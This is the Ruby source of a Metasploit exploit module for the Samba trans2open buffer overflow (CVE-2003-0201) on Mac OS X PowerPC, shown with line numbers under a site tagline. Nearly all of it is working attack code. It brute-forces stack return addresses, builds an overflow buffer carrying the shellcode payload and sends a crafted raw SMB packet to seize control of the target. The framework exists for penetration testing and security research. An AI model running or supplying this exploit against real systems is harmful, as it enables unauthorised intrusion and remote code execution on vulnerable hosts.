Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SMB::Client
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Samba trans2open Overflow (Mac OS X PPC)',
15
      'Description'    => %q{
16
          This exploits the buffer overflow found in Samba versions
17
        2.2.0 to 2.2.8. This particular module is capable of
18
        exploiting the bug on Mac OS X PowerPC systems.
19
      },
20
      'Author'         => [ 'hdm', 'jduck' ],
21
      'References'     =>
22
        [
23
          [ 'CVE', '2003-0201' ],
24
          [ 'OSVDB', '4469' ],
25
          [ 'BID', '7294' ],
26
          [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]
27
        ],
28
      'Privileged'     => true,
29
      'Payload'        =>
30
        {
31
          'Space'    => 1024,
32
          'BadChars' => "\x00",
33
          'MinNops'  => 512,
34
        },
35
      'Platform'       => 'osx',
36
      'Arch'           => ARCH_PPC,
37
      'Targets'        =>
38
        [
39
          [ 'Samba 2.2.x - Bruteforce',
40
            {
41
              # Not necessary on PPC
42
              # 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
43
              'Offset'       => 1195,
44
              'Bruteforce'   =>
45
                {
46
                  'Start' => { 'Ret' => 0xbffffdfc },
47
                  'Stop'  => { 'Ret' => 0xbfa00000 },
48
                  'Step'  => 512
49
                }
50
            }
51
          ]
52
        ],
53
      'DisclosureDate' => '2003-04-07',
54
      'DefaultTarget' => 0))
55

56
    register_options(
57
      [
58
        Opt::RPORT(139)
59
      ])
60

61
    deregister_options('SMB::ProtocolVersion')
62
  end
63

64
  # Need to perform target detection
65
  def autofilter
66
    false
67
  end
68

69
  def brute_exploit(addrs)
70

71
    curr_ret = addrs['Ret']
72
    begin
73
      print_status("Trying return address 0x%.8x..." %  curr_ret)
74

75
      connect(versions: [1])
76
      smb_login
77

78
      # 1988 is required for findrecv shellcode
79
      pattern = rand_text_english(1988)
80

81
      # This stream covers the framepointer and the return address
82
      off = target['Offset']
83
      pattern[off, 64] = [curr_ret].pack('N') * 16
84

85
      # Stuff the shellcode into the request
86
      pattern[3, payload.encoded.length] = payload.encoded
87

88
      trans =
89
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
90
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
91
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
92
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
93
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
94
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
95
        pattern
96

97
      sock.put(trans)
98
      handler
99
      disconnect
100

101
    rescue EOFError
102
    rescue => e
103
      print_error(e.to_s)
104
    end
105

106
  end
107
end
108

109